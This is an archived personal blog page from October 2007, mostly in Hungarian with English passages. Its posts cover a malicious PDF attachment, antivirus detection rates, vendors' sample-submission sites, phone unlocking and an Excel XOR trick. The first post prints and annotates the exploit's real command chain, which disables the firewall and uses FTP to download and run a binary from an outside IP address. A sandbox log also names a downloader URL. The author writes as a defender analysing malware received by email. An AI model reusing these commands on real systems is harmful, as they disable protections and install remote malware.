Archive for October, 2007

Az előző PDF exploit magyarázata – details on PDF containing exploit

Tuesday, October 30th, 2007

Így néz ki a tegnap kapott biztonsági hibát tartalmazó PDF fájl:
(This is how the recently received PDF document’s exploit looks like:)

../../../windows/system32/cmd”.exe”” /c ” cmd
/c = kódvégrehajtás “parancs1 & parancs2 & … & parancsN” formában, idézőjelek között, “&” jellekkel elválasztva.
/c = execution of commands, between quotes, separated by “&”s, eg.: “command1 & command2 & … & commandN”

set
cls

netsh firewall set opmode mode=disable
kikapcsoljuk a tűzfalat (disable the firewall)

echo o 81.95.146.181 >i
echo binary >>i
echo get /system.com >>i
echo quit >>i
“i” nevű ftp scriptet kreálása, mely megnyitja a 81.95.146.181-es hostot, bináris módba kapcsol, letölti a system.com-ot majd kilép.
(Creation of FTP script “i”, which will open 81.95.146.181, switches to binary, downloads system.com then exits)

ftp -s:i -v -A >nul
Az FTP script végrehajtása (-v=távoli kiszolgáló válaszainak letiltása, -A=Anonim bejelentkezés)
(Execution of the FTP script. -v=don’t display remote replies, -A=use anonymous account)

del /q i
Script törlése (Delete script)

start system.com
Letöltött “system.com” indítása
(Execution of downloaded “system.com”)

Mellesleg én nem tudtam letölteni de még kapcsolódni sem a fenti IP-hez, valószínűleg túl lett terhelve vagy lekapcsolták…
(BTW, I wasn’t able to download or even connect to the above IP. Might be overloaded or kicked off.”)

Posted in Case Study, English, technikai infók | No Comments »

Már megint egy csúnyaság – PDF trójai letöltő…

Tuesday, October 30th, 2007

Kaptam az imént egy PDF melléklettel bíró levelet. Elsőre úgy tűnt, hogy valami spam, az üzenetben lévő “Please have a look at attached document.” és a “report.2007.10.29.6129157.pdf” mellékletnévből. Gondoltam megnézem ebben éppen mi van, mert már jó ideje nem jött ilyen spam.

Hát, nem spam volt. Ez viszonylag hamar feltűnt, mert felugrott egy DOS ablak cmd.exe-vel…
Már húztam is ki az UTP csatlakozót…

Szerverünkön kézi filter adjusztálása, virustotal és információgyűjtés után úgy tűnik, hogy ez egy PDF-exploitos gozi (vagy végül is akármi más) trojan installer.
http://www.secureworks.com/research/threats/gozipdf

Virustotal eredménye:
A(z) report.2007.10.29.6129157.pdf állomány feltöltve: 2007.10.29 23:22:17 (CET)
Eredmény: 6/31 (19.36%)

Antivírus

 Verzió
 Utolsó frissítés
 Eredmény
AhnLab-V3 2007.10.30.0 2007.10.29
AntiVir 7.6.0.30 2007.10.29 EXP/PDF.URI.Gen
Authentium 4.93.8 2007.10.29
Avast 4.7.1074.0 2007.10.29
AVG 7.5.0.503 2007.10.29
BitDefender 7.2 2007.10.30
CAT-QuickHeal 9.00 2007.10.29 Expoit.PDF.CVE-2007-5020
ClamAV 0.91.2 2007.10.29 Exploit.PDF-1
DrWeb 4.44.0.09170 2007.10.29
eSafe 7.0.15.0 2007.10.28
eTrust-Vet 31.2.5250 2007.10.29
Ewido 4.0 2007.10.29
FileAdvisor 1 2007.10.29
Fortinet 3.11.0.0 2007.10.19
F-Prot 4.3.2.48 2007.10.29
F-Secure 6.70.13030.0 2007.10.29
Ikarus T3.1.1.12 2007.10.29
Kaspersky 7.0.0.125 2007.10.30 Exploit.Win32.PDF-URI.l
McAfee 5151 2007.10.29
Microsoft 1.2908 2007.10.30
NOD32v2 2623 2007.10.29
Norman 5.80.02 2007.10.29
Panda 9.0.0.4 2007.10.29
Prevx1 V2 2007.10.29
Rising 19.47.02.00 2007.10.29
Sophos 4.23.0 2007.10.29
Sunbelt 2.2.907.0 2007.10.29
Symantec 10 2007.10.30 Bloodhound.Exploit.163
TheHacker 6.2.9.110 2007.10.27
VBA32 3.12.2.4 2007.10.28
VirusBuster 4.3.26:9 2007.10.29 Exploit.PDF.Gen

További információ
File size: 4854 bytes
MD5: 356caee3eff70746d7dceec345123f21
SHA1: 2403cb3c827b9504f7717bbafdcb5e89ed847924

Tehát sok víruskereső nem csinál vele semmit, ami értelemszerűen nem túl jó. Jó kis PDF exploit családot vélek vízionálni a közeljövőre. Az exploit egyébként 2007 szeptember 20.-án jelent meg a bugtraq-on.

Konklúzió:
A víruskeresőkön felül nem bízhatunk ma már a PDF fájlokban sem.
Frissítsük sürgősen Acrobat Reader-ünket innen:
http://www.adobe.com/support/security/bulletins/apsb07-18.html

Addendum: Ühm, úgy tűnik, hogy magyarból csak 8.0 van és csak angolból van 8.11. Akkor marad vagy az angol, vagy a fentiekben leírt registry hackelés…

Posted in Case Study, technikai infók | 1 Comment »

Nokia 9500 (és társai) unlock

Thursday, October 25th, 2007

Történt az, hogy 2 év után szolgáltatót váltottunk (Vodafone -> Pannon).
Szerettem volna, ha a Nokia 9500 Communicator-omat hivatalosan SIM kártyafüggetlenné teszik. Ezért tehát elfáradtam a West-Endbe lévő Vodafone kirendeltséghez, ahol kis várakozás után azt az információt kaptam, hogy ehhez bizony aláírási címpéldány kell (mert céges a telefon).

Ezt ott akkor is baromságnak gondoltam, mert bár mondhatni, hogy a szolgáltatófüggetlenítés határeset, de mégis inkább a telefon hardveréhez van több köze, hiszen nem kell ehhez semmifajta szolgáltatásnak meglennie a szolgáltatónál (amelyikhez a telefon simlock-olva van) és mindegy, hogy kitől van bele a SIM kártya. Tehát nem arról van szó, hogy emeltdíjas díjcsomagot szeretnék a telefonomhoz (értsd: inkább a telefonszámhoz) vagy még kérek 20 előfizetést vagy ilyesmi, hanem a szolgáltatást nem érintő, tisztán “hardveres” beavatkozásról van szó.
Onnantól kezdve, hogy ez telefont érintő “szervíz” és készpénzzel fizetek, nem értem miért kell bármiféle papír. Hiszen a telefont ledobhatom az emeletről, eladhatom, vehetek hozzá másik akkumulátort tehát szabadon rendelkezem vele így semmi értelme a szolgáltatófüggetlenítéshez papirokat kérni. (Nyílván a cégem felé lehet valami elszámolási kötelezettségem, de ehhez semmi köze a szolgáltatónak).

Meg persze elvihetem az “arab”-hoz is, hogy kódolja ki, de azzal az erővel már én is megcsinálhatom, akkor jobban érzem magam meg “olcsóbb” is.

Szóval miután tegnap a vodafone megszűnt számomra szolgáltatást nyújtani és még nem sikerült újra felkeresnem őket papírokkal felszerelkezve, reggelre kiégett a biztosítékom. Amúgy is volt még egy 3120-as amit ki kellett kódolni, ezt meg lehet tenni a http://unlock.nokiafree.org/ weboldalon. A 3120-ast 3100-ként kell kiválasztani és “GEN”-nek “Original”-t választani. További pár percembe telt, mire kiderítettem, hogy a listából nem választható 9500-ösnek mi a megfelelője. A megfejtés: ASIC-2. További megfejtések itt: http://www.nokia-tuning.net/index.php?s=asic

Minthogy asszem most bűncselekményt hajtottam végre, megyek és feljelentem magam.
De csak akkor, ha nincsenek sokan és nem kell hozzá aláírási címpéldány…

Posted in Bosszantyú, Magyarország te csodás, technikai infók | 1 Comment »

Food for tought…

Wednesday, October 24th, 2007

Zöldségkosár – Greenpieces

Tojásék – Hello from the Ham and Eggs family

 

Ubi forti – cucumbersome

Posted in English, képek, Móka | No Comments »

Melyik víruskereső a jobb…

Friday, October 19th, 2007

A legközelebb álló válasz talán az, hogy mikor-melyik…
Persze finomabb részletekbe is bele lehet menni, mennyi és mikori vírusmintákat tartalmaz, milyen gyakran frissítik, működik-e egyáltalán – mert ilyen is van, tapasztalatok szerint az E-Trust (Inoculan) csak akkor szól, hogy vírus van, ha már elindítottuk (és elkezdi kifejteni áldásos tevékenységét).

Vagy pl. a ClamAV le van maradva a régi vírusok felismerése tekintetében, bár ez manapság annyira nem érdekes, hiszen egy levelezőszerveren jellemzően újfajta vírusok próbálnak terjengeni, egy onehalf nem, hacsak nem valaki mókából ilyet küld valakinek, bár kétséges, hogy ez egy NT/2000/XP alatt egyáltalán képes-e valamit csinálni.

A vírusadatbázis frissességét úgy lehet ellenőrizni, hogy az ember kap egy új vírust és megnézi az összes víruskereső aktuálisan lefrissített változatával. Na persze ennél van egyszerűbb megoldás, a virustotal.com üzemeltet egy olyan szolgáltatást, melyen jelenleg 31 víruskereső aktuálisan frissített változata van és nekünk csak fel kell tölteni a kérdéses fájlt.

Példának okáért mellékelem a ma kapott “brand-new”, használt víruskeresőink által nem-nagyon felismert “gyanús fájlok” eredményeit:

1) http://www.virustotal.com/hu/resultado.html?34bff11f38f42cbee2fa81bd47173038

A(z) access.exe állomány feltöltve: 2007.10.19 13:53:07 (CET)

Eredmény: 17/32 (53.13%)

Antivírus

 Verzió
 Utolsó frissítés
 Eredmény
AhnLab-V3 2007.10.19.0 2007.10.18
AntiVir 7.6.0.27 2007.10.19 Worm/Warezov.SN
Authentium 4.93.8 2007.10.19
Avast 4.7.1051.0 2007.10.18
AVG 7.5.0.488 2007.10.19 Downloader.Generic6.PFM
BitDefender 7.2 2007.10.19 Generic.Malware.dld!!.4333A34A
CAT-QuickHeal 9.00 2007.10.18
ClamAV 0.91.2 2007.10.17
DrWeb 4.44.0.09170 2007.10.19 Trojan.DownLoader.35874
eSafe 7.0.15.0 2007.10.15 suspicious Trojan/Worm
eTrust-Vet 31.2.5223 2007.10.19
Ewido 4.0 2007.10.19
FileAdvisor 1 2007.10.19
Fortinet 3.11.0.0 2007.10.19
F-Prot 4.3.2.48 2007.10.19 W32/Downldr2.AICW
F-Secure 6.70.13030.0 2007.10.19 Email-Worm.Win32.Warezov.sn
Ikarus T3.1.1.12 2007.10.19 Win32.SuspectCrc
Kaspersky 7.0.0.125 2007.10.19 Email-Worm.Win32.Warezov.sn
McAfee 5144 2007.10.18
Microsoft 1.2908 2007.10.19
NOD32v2 2603 2007.10.19 Win32/Stration.AAU
Norman 5.80.02 2007.10.18 W32/Downloader
Panda 9.0.0.4 2007.10.18 Suspicious file
Prevx1 V2 2007.10.19 W32.MALWARE.GEN
Rising 19.45.42.00 2007.10.19
Sophos 4.22.0 2007.10.19 Troj/StraDl-E
Sunbelt 2.2.907.0 2007.10.18
Symantec 10 2007.10.19 W32.Stration!dldr
TheHacker 6.2.9.099 2007.10.19
VBA32 3.12.2.4 2007.10.19 suspected of Win32.Trojan.Downloader (http://…)
VirusBuster 4.3.26:9 2007.10.18
Webwasher-Gateway 6.6.1 2007.10.19 Worm.Warezov.SN

További információ
File size: 4096 bytes
MD5: d3a68da3efb69d359065ce52d0615514
SHA1: ce6e78b9fe4b150d320e0c5e789b9f94a5bf7927
packers: UPX
packers: PE_Patch.UPX, UPX
norman sandbox: [ General information ]
* **IMPORTANT: PLEASE SEND THE SCANNED FILE TO: ANALYSIS@NORMAN.NO – REMEMBER TO ENCRYPT IT (E.G. ZIP WITH PASSWORD)**.
* File length: 4096 bytes.        

[ Changes to filesystem ]
* Creates file C:\WINDOWS\SYSTEM32\mbf32.exe.

[ Network services ]
* Opens URL: http://kadesuipontunhandesun.com/mbf32.exe.
* Connects to \”kadesuipontunhandesun.com\” on port 80 (TCP).
* Opens URL: kadesuipontunhandesun.com/mbf32.exe.

[ Security issues ]
* Starting downloaded file – potential security problem.
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PX5=26F78B2F0003CD1510F000D120933B00B79BCD14


Lehet látni, hogy pl. a ClamAV és a McAfee sem ismerte fel a vírust, de itt még mindig sokkal jobb a helyzet, mint a második példán:

2) http://www.virustotal.com/hu/resultado.html?6c18eb347437168ff96c38ec1822ce66

A(z) en.hta állomány feltöltve: 2007.10.19 13:53:42 (CET)
Eredmény: 6/31 (19.36%)

Antivírus

 Verzió
 Utolsó frissítés
 Eredmény
AhnLab-V3 2007.10.19.0 2007.10.18
AntiVir 7.6.0.27 2007.10.19
Authentium 4.93.8 2007.10.19
Avast 4.7.1051.0 2007.10.18 JS:Feebs family
AVG 7.5.0.488 2007.10.19 Worm/Feebs
BitDefender 7.2 2007.10.19
CAT-QuickHeal 9.00 2007.10.18
ClamAV 0.91.2 2007.10.17
DrWeb 4.44.0.09170 2007.10.19
eSafe 7.0.15.0 2007.10.15
eTrust-Vet 31.2.5223 2007.10.19
Ewido 4.0 2007.10.19
FileAdvisor 1 2007.10.19
Fortinet 3.11.0.0 2007.10.19
F-Prot 4.3.2.48 2007.10.19
F-Secure 6.70.13030.0 2007.10.19
Ikarus T3.1.1.12 2007.10.19
Kaspersky 7.0.0.125 2007.10.19
McAfee 5144 2007.10.18 JS/Feebs.gen.aa@MM
Microsoft 1.2908 2007.10.19
NOD32v2 2603 2007.10.19 JS/Tivso.15.gen
Norman 5.80.02 2007.10.18
Panda 9.0.0.4 2007.10.18
Prevx1 V2 2007.10.19
Rising 19.45.42.00 2007.10.19
Sophos 4.22.0 2007.10.19
Sunbelt 2.2.907.0 2007.10.18
Symantec 10 2007.10.19 W32.Feebs@mm
TheHacker 6.2.9.099 2007.10.19
VBA32 3.12.2.4 2007.10.19 Trojan-Dropper.JS.Feebs
VirusBuster 4.3.26:9 2007.10.18

További információ
File size: 78874 bytes
MD5: 8cfacc22531b7cde7a2e5ed34d581a5b
SHA1: 0d3a72d2a60cc18b191f68bbde174eeb8f39271c

Itt a 31 víruskeresőből csak 6 gondolta, hogy ez mégiscsak valami ármány…

Természetesen ilyenkor az ember megpróbálja értesíteni a víruskeresőgyártó cégeket, de úgy tűnik, hogy ők nem kiváncsiak erre. Vagy egyáltalán nem teszik lehetővé fájl elküldését (vagy ha igen, nagyon eltitkolt helyen), vagy annyira megnehezítik a procedúrát, hogy az ember elküldi őket magában a meleg éghajlatra és nem foglalkozik vele. Pl. regisztráció szükséges – és küldjem emailben – ilyen meg olyan jelszóval, ilyen meg olyan formátumban tömörítve, mely emailt jó eséllyel megfogja valahol egy szerver – pl. a miénk, hiszen az minden futtatható (elméletben kártékony kódot tartalmazó) nem vírusként felismert fájlt is elhelyez egy kicsit pihenni, és csak késleltetve küldi tovább. Plussz értesítést küld, ha a “váróterem”-ben lévő fájlok száma csúnyán megnő.

Visszatérve a vírusirtógyártó cégekre. Az ideális hely az, ahol online, mindenféle egyéb munka nélkül (tömörítés, jelszó), kis kommenttel el lehet küldeni a mintát.

Jó példák:
ClamAV
http://clamav.sourceforge.net/cgi-bin/sendvirus.cgi
A minta küldési felületen minden megvan ami kellhet, sőt elküldéskor a saját motorjuk is ellenőrzi, hogy szerinte virus-e vagy csak nekem volt régi az adatbázisom (nálam általában az első…)

F-Prot
http://www.f-prot.com/virusinfo/submission_form.html
Point-and-click. Feltallózom a vírust, beírok valami kommentet (pl. a virustotal eredménylinkjét) és kész (Submission successful).

Virusbuster
https://support.virusbuster.hu/index.php?_m=tickets&_a=submit
Itt már üldözni kell egy kicsit a virus submit oldalt, és direkt link sincs kitéve, de még elmegy. Név/email (autofill), prioritás választása, file feltallózása, küldés, köszönjük…
(Közben tényleg jött tőlük egy “köszönjük” levél: “Köszönjük a beküldött mintát a néhány óra múlva megjelenő VirusBuster adatbázissal már Trojan.DL.Opnis.UT-nek ismerjük fel.”)

És a negatívumok:
Computer Associates E-Trust (Inoculan/InoculateIT)
http://home3.ca.com/Support/VirusSampleForm.aspx?
Felejtős. Autofill persze kitölt mindent, alul a file feltöltésnél az olvasható, hogy: “Attach the (preferably compressed and password protected) virus sample.”. Számomra ez azt jelenti, hogy “jó lenne, ha tömörítve és jelszavazva lenne” – de nem kizárólagos feltétel. Tömörítés (és jelszó) nélkül a submit után viszont a következőt kapjuk: “An error has occurred while uploading your file. Please go back and resubmit the form.
Make sure that you compress the virus sample using winzip, or pkzip, or any of a number of popular file compression utilities.”
Már évekkel ezelőtt jeleztem nekik… Nem minősítem jelzővel. Majd megkapják valahonnan.

Network Associates
https://www.webimmune.net/default.asp
Már volt róluk szó, változatos hibákkal tudják szórakoztatni az embert. Autofill nem működik és általában bejelentkezés után az jön, hogy a “Webimmune temporarily unavailable.” – küldjem email-ben… Most éppen a login sem működött, ez kaptam:
https://www.webimmune.net/validateLogin.asp
“A webhely nem tudja megjeleníteni a lapot
HTTP 500
A legvalószínűbb okok:
A webhely karbantartás alatt áll.
A webhely programozási hibát tartalmaz.”

Kaspersky:
http://www.kaspersky.com/scanforvirus
Van tallózás, küldés, szerintük: “You’re clean! Kaspersky Anti-Virus has not detected any viruses at this time in the file you submitted.” – Nincs lehetőség azt mondani, hogy “I disagree…”

Posted in Bosszantyú, Case Study, technikai infók | 3 Comments »

Excel reloaded

Sunday, October 14th, 2007

És akkor álljon itt az Excel-es (Openoffice-os) XOR implementáció. Mivel az interneten nem találtam hasonló leírást, angolul (is) részletezem, hogy örüljenek más kontinenseken is…

Once upon a time, I wanted to do some basic XOR-ing in excel. Then I realized that there are no such thing a XOR. So I “developed” one and even though this is pretty simple to do, Google doesn’t seem to get such a solution, so I publish it here and now.

Since XOR is basically similar to add, eg.: (binary) adding or XOR-ing 0 vs. 1, 1 vs. 0 and 0 vs. 0 result the same, we only have to “do something” when there are two “1”-s to be dealt, as 1+1=2 but 1 xor 1=0.
Unfortunately to convert to binary, we need to enable Analysis Toolpak in Tools/Add-ins (in hungarian: Eszközök/Bővítménykezelő) to allow to use DEC2BIN (and HEX2BIN, whichever you want) then it is easy pie.

Let’s see 15 XOR 6
15 (decimal) will become 1111 “bin” after a DEC2BIN(15) and 6 will become 110. Adding the converted numbers as decimal will result in 1221. Then a SUBSTITUTE of “2”-s to “0”-s will be 1001, so after a BIN2DEC, you will get the result: 9.
(Doing “OR” instead of “XOR” would need a replacement of “2”-s to “1”-s)

xxx2yyy conversion fuctions have a limit of 0-511, so if your number is above, deal with it first.

So, if A1 and B1 contains the two (decimal) numbers to be xored, then C1 would be:
=SUBSTITUTE(DEC2BIN(A1)+DEC2BIN(B1),2,0)

Magyarul: Ha A1 és B1 tartalmazza a két összexorolandó (decimális) számot, akkor C1:
=HELYETTE(DEC2BIN(A1)+DEC2BIN(B1);2;0)
(angol excel vagy openoffice esetén az angolnál leírt képlet)
Az xxx2xxx függvények használatához engedélyeznünk kell az Eszközök/Bővítménykezelő-ben az Analysis Toolpak bővítményt melyek 0-tól 511-ig terjedő tartományban bírnak (csak) működni.

We get the result in binary, which we can convert with BIN2DEC or BIN2HEX (can also use HEX2BIN instead of DEC2BIN if we want to xor hex numbers right away)

Other ideas welcome / Egyéb ötletek jöhetnek

Posted in English, Microsoft, technikai infók | 4 Comments »

Gaj-ra menni..

Monday, October 8th, 2007

 

(Szlovénia, 2003 július)

Posted in képek, Móka | No Comments »